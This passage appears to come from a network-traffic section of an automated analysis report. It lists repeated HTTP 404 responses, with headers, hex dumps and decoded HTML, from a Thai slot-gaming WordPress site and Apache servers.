2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 37 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 63 6f 62 61 31 36 38 20 e0 b8 aa e0 b8 a5 e0 b9 87 e0 b8 ad e0 b8 95 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 a3 e0 b8 a7 e0 b8 a1 e0 b9 80 e0 b8 81 e0 b8 a1 e0 b8 84 e0 b8 b8 e0 b8 93 e0 b8 a0 e0 b8 b2 e0 b8 9e e0 b8 88 e0 b8 b2 e0 b8 81 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 e0 b8 94 e0 b8 b1 e0 b8 87 20 e0 b9 81 e0 b8 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 68 5f 54 48 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 63 6f 62 61 31 36 38 20 e0 b8 aa e0 b8 a5 e0 b9 87 e0 b8 ad e0 b8 95 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 a3 e0 b8 a7 e0 b8 a1 e0 b9 80 e0 b8 81 e0 b8 a1 e0 b8 84 e0 b8 b8 e0 b8 93 e0 b8 a0 e0 b8 b2 e0 b8 9e e0 b8 88 e0 b8 b2 e0 b8 81 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 e0 b8 94 e0 b8 b1 e0 b8 87 20 e0 b9 81 e0 b8 Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><me
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:18:22 GMTServer: ApacheX-Powered-By: PHP/8.2.23Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 37 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 63 6f 62 61 31 36 38 20 e0 b8 aa e0 b8 a5 e0 b9 87 e0 b8 ad e0 b8 95 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 a3 e0 b8 a7 e0 b8 a1 e0 b9 80 e0 b8 81 e0 b8 a1 e0 b8 84 e0 b8 b8 e0 b8 93 e0 b8 a0 e0 b8 b2 e0 b8 9e e0 b8 88 e0 b8 b2 e0 b8 81 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 e0 b8 94 e0 b8 b1 e0 b8 87 20 e0 b9 81 e0 b8 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 68 5f 54 48 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 63 6f 62 61 31 36 38 20 e0 b8 aa e0 b8 a5 e0 b9 87 e0 b8 ad e0 b8 95 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 a3 e0 b8 a7 e0 b8 a1 e0 b9 80 e0 b8 81 e0 b8 a1 e0 b8 84 e0 b8 b8 e0 b8 93 e0 b8 a0 e0 b8 b2 e0 b8 9e e0 b8 88 e0 b8 b2 e0 b8 81 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 e0 b8 94 e0 b8 b1 e0 b8 87 20 e0 b9 81 e0 b8 Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><me
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:18:25 GMTServer: ApacheX-Powered-By: PHP/8.2.23Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 37 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 63 6f 62 61 31 36 38 20 e0 b8 aa e0 b8 a5 e0 b9 87 e0 b8 ad e0 b8 95 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 a3 e0 b8 a7 e0 b8 a1 e0 b9 80 e0 b8 81 e0 b8 a1 e0 b8 84 e0 b8 b8 e0 b8 93 e0 b8 a0 e0 b8 b2 e0 b8 9e e0 b8 88 e0 b8 b2 e0 b8 81 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 e0 b8 94 e0 b8 b1 e0 b8 87 20 e0 b9 81 e0 b8 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 68 5f 54 48 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 63 6f 62 61 31 36 38 20 e0 b8 aa e0 b8 a5 e0 b9 87 e0 b8 ad e0 b8 95 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 a3 e0 b8 a7 e0 b8 a1 e0 b9 80 e0 b8 81 e0 b8 a1 e0 b8 84 e0 b8 b8 e0 b8 93 e0 b8 a0 e0 b8 b2 e0 b8 9e e0 b8 88 e0 b8 b2 e0 b8 81 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 e0 b8 94 e0 b8 b1 e0 b8 87 20 e0 b9 81 e0 b8 Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><me
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:18:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:18:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:18:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:18:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:20:58 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:21:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:21:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:21:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
